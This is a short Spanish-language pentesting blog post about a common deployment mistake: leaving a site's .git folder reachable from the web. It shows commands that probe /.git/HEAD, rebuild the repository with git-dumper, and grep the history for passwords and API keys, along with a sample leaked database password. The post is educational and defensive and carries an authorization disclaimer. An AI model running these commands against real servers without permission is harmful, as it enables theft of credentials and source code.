~ / blog / pentesting
KALI

Secretos en un .git expuesto

Un error de despliegue muy común: dejar la carpeta punto git accesible en la web.

Con eso, se puede descargar todo el historial del código fuente, con contraseñas y llaves que quedaron en commits viejos. git-dumper reconstruye el repositorio completo desde la web.

Luego, con las herramientas de git, buscas secretos en toda la historia. Un solo punto git expuesto puede entregar las llaves de todo el reino.

Nunca subas el punto git a producción.

# los comandos

kali@kali:~$ curl -s http://10.0.0.5/.git/HEADcopiar
ref: refs/heads/main <- .git expuesto!
kali@kali:~$ git-dumper http://10.0.0.5/.git/ ./codigocopiar
[+] Fetched objects
[+] Running git checkout .
kali@kali:~$ cd codigo && git log -p | grep -iE 'password|secret|api_key'copiar
+ DB_PASS = 'Verano2026!'
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.